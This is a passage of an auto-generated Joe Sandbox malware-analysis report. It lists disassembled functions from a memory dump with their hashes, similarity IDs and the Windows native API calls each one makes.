Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: 8cc01e20a2933b902b1f75510f3967432f7718617856dc84b85279004e2d3f1b
Instruction ID: 1aff50870d897da718d5ff1262b189f922b5ac218b526070efe2bfa59ef1cfa8
Opcode Fuzzy Hash: 8cc01e20a2933b902b1f75510f3967432f7718617856dc84b85279004e2d3f1b
Instruction Fuzzy Hash: 17012175A00209ABDB00DFADE9819EEBBB8EF48710F10405AF905F7380D7349A11CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 72715162, Relevance: 3.0, APIs: 2, Instructions: 44nativeCOMMON

Download Yara Rule

APIs

ZwClose.210A(?,?,?,?,7271528A,?,00000000,00000000), ref: 7271519B
RtlWakeAllConditionVariable.210A(?,?,?,?,7271528A,?,00000000,00000000), ref: 727151BB

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CloseConditionVariableWake
String ID:
API String ID: 20659125-0
Opcode ID: e6356b2e2b76d97bcbcb2ee5d048e70208dd814da2914adfcbdf52533d6e6844
Instruction ID: 6c3a462225a0986139c5fc30866568e3bf49babaeccdc8d558dd113f193c2f7f
Opcode Fuzzy Hash: e6356b2e2b76d97bcbcb2ee5d048e70208dd814da2914adfcbdf52533d6e6844
Instruction Fuzzy Hash: 9601AD323046066BC31A8A2DDA45F96B7A9EFC0721F00462AE91A8B190DF30F961C7D4

Uniqueness

Uniqueness Score: -1.00%

Function 72719623, Relevance: 3.0, APIs: 2, Instructions: 44nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(?,?,7FFE0386,?,?,?,?,?,?,?,?,?,?,726A2857,?,?), ref: 72719659
ZwTraceEvent.210A(?,00000402,00000014,?,?,?,7FFE0386), ref: 72719686

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: b131d11ebfb92ba5a111d990572a64ac565a957769f9a4d04d03b3138fda889c
Instruction ID: 07911384e24a8fb9217fadc5346f399136c9c18e658a9621fea7b113f9b7c9a7
Opcode Fuzzy Hash: b131d11ebfb92ba5a111d990572a64ac565a957769f9a4d04d03b3138fda889c
Instruction Fuzzy Hash: 8D011E75A00249ABCB04CFA9D9419EEBBB8EF48710F10405AE905E7391D6349E11CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 7271969E, Relevance: 3.0, APIs: 2, Instructions: 44nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(?,?,7FFE0386,?,?,?,?,?,?,?,?,?,?,?,726A2884,?), ref: 727196D4
ZwTraceEvent.210A(?,00000403,00000014,?,?,?,7FFE0386), ref: 72719701

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: 6fa0b52a6c2fc33740271fabff2deff18b32e34d5c3b768b606a668ca41d1eaa
Instruction ID: 3a61248114f5936425f5d8a6e8e8208c4c28fd1dca40a8898a6803d237edfa16
Opcode Fuzzy Hash: 6fa0b52a6c2fc33740271fabff2deff18b32e34d5c3b768b606a668ca41d1eaa
Instruction Fuzzy Hash: 8A012C75A00249ABCB00CFADD9919EEBBB8FF48710F10405AF905F7380D734AA11CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 72718452, Relevance: 3.0, APIs: 2, Instructions: 44nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(?,00000000,0000008C,00000000,?,7265EF94,?,?,7267F2ED,72737B60,72737B60,00000000,00000000,00000000,7267F281,00000000), ref: 72718488
ZwTraceEvent.210A(?,00020402,00000014,?,?,00000000,0000008C,00000000,?,7265EF94,?,?,7267F2ED,72737B60,72737B60,00000000), ref: 727184B5

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: 2b0a97eef06ea3298a95a66423db74f6dbf45145928965ba0afeb1d92c6ee515
Instruction ID: 3b6c5412357214ea819397d0c4d958bf2d4662abf657656bb3a1acb570ca0ca2
Opcode Fuzzy Hash: 2b0a97eef06ea3298a95a66423db74f6dbf45145928965ba0afeb1d92c6ee515
Instruction Fuzzy Hash: 85012175A00219ABDB04DFADDA419EEBBB8EF88710F10405AF905FB381D734AD11CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 726503DD, Relevance: 3.0, APIs: 2, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 7265044F: ZwOpenKey.210A(00000000,00000001,72621088,?,?,72650402,?), ref: 7265046D

RtlInitUnicodeString.210A(?,?,?,?), ref: 72650414
ZwQueryValueKey.210A(00000000,?,00000002,?,00000078,?,?,?,?,?), ref: 7265042D

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InitOpenQueryStringUnicodeValue
String ID:
API String ID: 1506694742-0
Opcode ID: b124cd0a7ae00439f441b6aa9cb2b4aecdf3b5ff4dbcb3e37251d76edb7c792d
Instruction ID: 263d6d993d1d8f555c2cd3ba581f6bb54f26e25046d73b7d65cbbb56e06e740e
Opcode Fuzzy Hash: b124cd0a7ae00439f441b6aa9cb2b4aecdf3b5ff4dbcb3e37251d76edb7c792d
Instruction Fuzzy Hash: 66F04F72504304AAD220EE6D9846EAB7BEDDBC9610F44492EB999C31C0FB35D905C3E3

Uniqueness

Uniqueness Score: -1.00%

Function 72647025, Relevance: 3.0, APIs: 2, Instructions: 43memorytimeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.210A(00000001,?,7271F770,?,00000000,00000000,7FFFFFFF,?,?,?,?,726D3CFE,?,727202C0,00000008,72671C00), ref: 72647056
RtlFreeHeap.210A(?,00000000,00000002,7FFFFFFF,?,?,?,?,726D3CFE,?,727202C0,00000008,72671C00,?,?), ref: 7264707B

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: DebugFreeHeapPrintTimes
String ID:
API String ID: 3752032992-0
Opcode ID: 1d61e143b9a43e2528d4352e815ed6276fe9f597eba0347716141807958eebe8
Instruction ID: ad05bee2e834cbf0809a0868676ae7de2ab7955c81ade5984d57e302c3bedef7
Opcode Fuzzy Hash: 1d61e143b9a43e2528d4352e815ed6276fe9f597eba0347716141807958eebe8
Instruction Fuzzy Hash: 6601A272201248AFD725CF59DD05FABBBFAEF84B10F11055EE84683191CBB1BA04C755

Uniqueness

Uniqueness Score: -1.00%

Function 727010CF, Relevance: 3.0, APIs: 2, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 7270110F
ZwTraceEvent.210A(?,00020402,00000018,?), ref: 7270113C

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: 82cf046ce8026538ce1eeb677fdb289bd617f07f0511622ea030cad308d44cbc
Instruction ID: 4aa9de01995114c8bae524bf02b54e46868a70b23fa8723ae934e4ab8b496c78
Opcode Fuzzy Hash: 82cf046ce8026538ce1eeb677fdb289bd617f07f0511622ea030cad308d44cbc
Instruction Fuzzy Hash: 2B01E9B5E00249EFCB14CFADD545AAEBBF4EF08300F10806AE915EB381E634DA10CB95

Uniqueness

Uniqueness Score: -1.00%

Function 7264B171, Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(00000000,?,?,726B2EB0,00000000,?,7266ED23,?,00000000,72737B60,7271F8D0,00000028), ref: 7264B17C
RtlGetCurrentServiceSessionId.210A ref: 726A578B

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentServiceSession
String ID:
API String ID: 1007659313-0
Opcode ID: 0037d6f32ef9c00e1de9b97805b7d5b21713bd041d2612fcf8e1a812496074a8
Instruction ID: 77d5c06f1f2440af46a8260a4737c5850b5328f0a3909fd3726666890b3a98c4
Opcode Fuzzy Hash: 0037d6f32ef9c00e1de9b97805b7d5b21713bd041d2612fcf8e1a812496074a8
Instruction Fuzzy Hash: 2401D136A00680EBD3238A9DC904B55BFAAEF81754F0840A3F905DB6E5DB79DD50C255

Uniqueness

Uniqueness Score: -1.00%

Function 727011D2, Relevance: 3.0, APIs: 2, Instructions: 42nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(00000000,0000001C,?,?,?,?,?,?,?,?,72705A07,00000000,?,00000000), ref: 72701201
ZwTraceEvent.210A(?,00020402,00000008,?,00000000,0000001C,?,?,?,?,?,?,?,?,72705A07,00000000), ref: 7270122E

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: ef8dbd7834e887eaba85ee64086b1559808377513fe6607707e69aa6accbf9e7
Instruction ID: da764958afe1839a3fd2175d68ea51b82bae44ee0ae5034b9deea128b7fb55a9
Opcode Fuzzy Hash: ef8dbd7834e887eaba85ee64086b1559808377513fe6607707e69aa6accbf9e7
Instruction Fuzzy Hash: 5D01D132B40248ABD704DFADC905AEEB7B9EB08710F00809AE911EB280EA7499058B94

Uniqueness

Uniqueness Score: -1.00%

Function 7271952E, Relevance: 3.0, APIs: 2, Instructions: 42nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(?,?), ref: 72719564
ZwTraceEvent.210A(?,00000403,00000014,?,?,?), ref: 72719591

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: 90dac7dc306f75f93ec124e0ef4a76555c2d29bc0b767ea8c08d1c7b70291a1a
Instruction ID: a3bf0554ab8ff505ce9ea29792ef8e1d9aab19886547afe9eaa80b9e302a616a
Opcode Fuzzy Hash: 90dac7dc306f75f93ec124e0ef4a76555c2d29bc0b767ea8c08d1c7b70291a1a
Instruction Fuzzy Hash: 1E012C71A00259ABCB04DFA9D941AEEBBB8AF48750F14405AE905AB280D734EA11CB99

Uniqueness

Uniqueness Score: -1.00%

Function 7271870A, Relevance: 3.0, APIs: 2, Instructions: 40nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(?,?,?,?,?,?,?,?,?,?,?,?,726B2D5A,?,00000003,?), ref: 7271874F
ZwTraceEvent.210A(?,00000402,00000018,?), ref: 7271877C

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: 54d716281b50981e908c2fb069a68e2c419de0a0e38edf27fd0397e51ee54c8d
Instruction ID: ef0c9ed06ceda634b6231d0ef41a92b6afb0c71094718e474530501418f2d3ae
Opcode Fuzzy Hash: 54d716281b50981e908c2fb069a68e2c419de0a0e38edf27fd0397e51ee54c8d
Instruction Fuzzy Hash: 3C011274E0020A9FD704CFADD545B9EFBF4FF08700F10416AA519EB381D6349940CB95

Uniqueness

Uniqueness Score: -1.00%

Function 726FF7D3, Relevance: 3.0, APIs: 2, Instructions: 39nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(?,?,?,?,?,?,?,7270B0F0,?,?,?,?,00000000), ref: 726FF7FE
ZwTraceEvent.210A(?,00020402,00000008,?,?,?,?,?,?,?,?,7270B0F0,?,?,?,?), ref: 726FF82B

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: 551c2abec68fc21d606c9c888618c52028cf87aa756b9401f263098c7c05555f
Instruction ID: 6f346172394421436b0fb15742e2b47704fae514ba24e70a1c7a123a5dda7cc1
Opcode Fuzzy Hash: 551c2abec68fc21d606c9c888618c52028cf87aa756b9401f263098c7c05555f
Instruction Fuzzy Hash: 74F0CD31B00248ABDB04DBADD905EBEB7B8EF45700F10416AF911EB6C0EA31ED11C789

Uniqueness

Uniqueness Score: -1.00%

Function 726770AF, Relevance: 3.0, APIs: 2, Instructions: 35nativeCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSectionEx.210A(72736D80,00000000,00000000,?,?,?,7267703C,7271FA80,00000018,726463AB), ref: 726770F7
ZwDelayExecution.210A(00000000,?,?,?,?,7267703C,7271FA80,00000018,726463AB), ref: 7269F18F

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CriticalDelayExecutionInitializeSection
String ID:
API String ID: 688281180-0
Opcode ID: e5a2433e3bf96e15619c45e4d9e56c00243cf99e07f121be5d2d8dc7fc80d8c6
Instruction ID: d419b3b115f2841b22f8e83e0308b13463b9446d3de031f66ab86722814deb65
Opcode Fuzzy Hash: e5a2433e3bf96e15619c45e4d9e56c00243cf99e07f121be5d2d8dc7fc80d8c6
Instruction Fuzzy Hash: BDF059B02592465ADB2A9A2FDD02B1333A5D701331F31CB0FE4A1CB3C1DB71D801CA9A

Uniqueness

Uniqueness Score: -1.00%

Function 7264B440, Relevance: 3.0, APIs: 2, Instructions: 34nativeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(?,?,?,?,?,726A4FEF,?,?,0000000B,?,?,00001002,00000000), ref: 7264B44F
ZwFreeVirtualMemory.210A(000000FF,?,?,00008000,?,?,?,?,?,726A4FEF,?,?,0000000B,?,?,00001002), ref: 7264B484

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AcquireExclusiveFreeLockMemoryVirtual
String ID:
API String ID: 1645669409-0
Opcode ID: 6f622925187988f1b2dfb4712bfbae7111c662f23a84aa0cce6f6b36293b6f0e
Instruction ID: 34e2508ea44db26bbb21db7e272221ba19c18708a193bf75ca252d5f2b20bbc5
Opcode Fuzzy Hash: 6f622925187988f1b2dfb4712bfbae7111c662f23a84aa0cce6f6b36293b6f0e
Instruction Fuzzy Hash: 07F03072C00618ABDB21CED8D840E9BB7FCEB15720F14165BE991A3284DA70BE548BE5

Uniqueness

Uniqueness Score: -1.00%

Function 72645420, Relevance: 3.0, APIs: 2, Instructions: 34nativethreadCOMMON

Download Yara Rule

APIs

memcmp.210A(-00000184,00000000,00000008), ref: 72645441
ZwSetInformationThread.210A(000000FE,0000002C,00000000,00000008), ref: 726A1CF0

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InformationThreadmemcmp
String ID:
API String ID: 3942342040-0
Opcode ID: 17644bd88da769d75d8f773eda7140e8d12291abaabd8f176dd1a17c1c225d35
Instruction ID: 313796128a926c9ba5b6fd716ed8c9368da8b5211c76fe33542331f9006113c8
Opcode Fuzzy Hash: 17644bd88da769d75d8f773eda7140e8d12291abaabd8f176dd1a17c1c225d35
Instruction Fuzzy Hash: 97F0BB71950308FBE715CB84CD42FDABB7CEB44715F104265AE49A72C1EB38DA44CB95

Uniqueness

Uniqueness Score: -1.00%

Function 727186A9, Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(?,?,?,?,?,?,?,?,726B2C6A,00000001,?,00000000), ref: 727186CA
ZwTraceEvent.210A(?,00020402,00000008,?,?,?,?,?,?,?,?,?,726B2C6A,00000001,?,00000000), ref: 727186F7

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: ab35764df45b51f8472453eed663d7f92cb385b31df1ed1012d55bf501007697
Instruction ID: fec6af198182018e07b40fff7a6bcc6605d1449ae474bee4663ebd55ee58d471
Opcode Fuzzy Hash: ab35764df45b51f8472453eed663d7f92cb385b31df1ed1012d55bf501007697
Instruction Fuzzy Hash: 95F0B470A40208AFD704DFACD641AAEB7B4EF44300F10809AE905EB281DA34DD00C755

Uniqueness

Uniqueness Score: -1.00%

Function 7270E407, Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

ZwQueryVirtualMemory.210A(000000FF,?,00000000,?,0000001C,00000000,?, fsr,000000FF,?,00000000,?,0000001C,00000000,?,?), ref: 7270E42A
ZwProtectVirtualMemory.210A(000000FF,?,?,00000000,00000000,000000FF,?,00000000,?,0000001C,00000000,?, fsr,000000FF,?,00000000), ref: 7270E44A

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: MemoryVirtual$ProtectQuery
String ID:
API String ID: 1355999870-0
Opcode ID: 08eda545f2cc4f318fbf2ccec5d096bf5ed7cfca70004bf799230cf1df73d51a
Instruction ID: 1a6521534b3fa8b6a3d83085469b3a18b3ae81575baae3d8e86147184124a677
Opcode Fuzzy Hash: 08eda545f2cc4f318fbf2ccec5d096bf5ed7cfca70004bf799230cf1df73d51a
Instruction Fuzzy Hash: 16F0FE76A0014DBBDB10DB98CD41FDEBBBCAB04324F244356BE24AB2D0E630EA559764

Uniqueness

Uniqueness Score: -1.00%

Function 72701071, Relevance: 3.0, APIs: 2, Instructions: 31nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(?,?,?,?,7264FCF3,?,727379A0), ref: 7270108F
ZwTraceEvent.210A(?,00000402,00000004,?,?,?,?,?,7264FCF3,?,727379A0), ref: 727010BC

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: 99da4a8a73c13a8d3e8d78a15a0d266ee48ab20212dd123f20b499ae01a43df6
Instruction ID: 267d641d5ab8cae046fda6e979e2b066fe06667898401160dd4a77d70b162d17
Opcode Fuzzy Hash: 99da4a8a73c13a8d3e8d78a15a0d266ee48ab20212dd123f20b499ae01a43df6
Instruction Fuzzy Hash: 6AF08271A01248ABCB14DBEDD646E9E7BB4EF48700F50009AE906FB2C1EA35DD14C758

Uniqueness

Uniqueness Score: -1.00%

Function 7271864B, Relevance: 3.0, APIs: 2, Instructions: 31nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(?,?,?,?,?,?,7266EB13,?,00000003,?), ref: 72718669
ZwTraceEvent.210A(?,00000402,000000E4,?,?,?,?,?,?,?,7266EB13,?,00000003,?), ref: 72718696

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: d036371b03a0737eb1b0d655c02f70f71be7aa44bea80a1b2f9cada6f3077b73
Instruction ID: 795384b1c4c734382d3d3f1f2755a6d989314b6ddbeec9c960622c721b3f5138
Opcode Fuzzy Hash: d036371b03a0737eb1b0d655c02f70f71be7aa44bea80a1b2f9cada6f3077b73
Instruction Fuzzy Hash: 61F0E970A00249EBDB04CBACD646D9E77B4EF45304F100059E805EB3C1DA34DD10C759

Uniqueness

Uniqueness Score: -1.00%

Function 727187ED, Relevance: 3.0, APIs: 2, Instructions: 31nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(?,?,?,?,726B2D21,?,?,?,?,?,?,?,?,7266CED3,?,?), ref: 7271880B
ZwTraceEvent.210A(?,00000402,00000004,?,?,?,?,?,726B2D21,?,?,?,?,?), ref: 72718838

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: a4e27b2292a839cfc8363002103dda0a2f41f5016bd9f671962ce03388386bbf
